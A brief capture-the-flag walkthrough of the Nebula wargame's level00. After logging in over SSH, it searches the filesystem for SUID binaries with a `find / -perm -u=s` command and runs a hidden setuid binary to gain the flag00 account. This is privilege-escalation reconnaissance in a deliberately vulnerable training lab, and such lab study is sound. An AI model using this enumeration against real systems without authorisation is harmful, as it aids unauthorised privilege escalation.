We start off with understanding what is being asked of us:
After SSH'ing into the host, we look around:
level00@nebula:~$ whoami level00 level00@nebula:~$ pwd /home/level00 level00@nebula:~$
Reading the about section, we see that we need to carefully look around the top level directories for anything suspicious.
We look for anything that may have the SUID flag set:
level00@nebula:~$ find / -perm -u=s -type f 2>/dev/null /bin/.../flag00 /bin/fusermount [...snippet...] user-suid-wrapper /rofs/usr/sbin/pppd /rofs/usr/sbin/uuidd level00@nebula:~$
Looks like we have a flag00 located in /bin/.../
We run the file and notice that we automatically switch to the flag00 user. We run the "getflag" command to complete the exercise:
level00@nebula:~$ /bin/.../flag00 Congrats, now run getflag to get your flag! flag00@nebula:~$ getflag You have successfully executed getflag on a target account flag00@nebula:~$
Next will be level01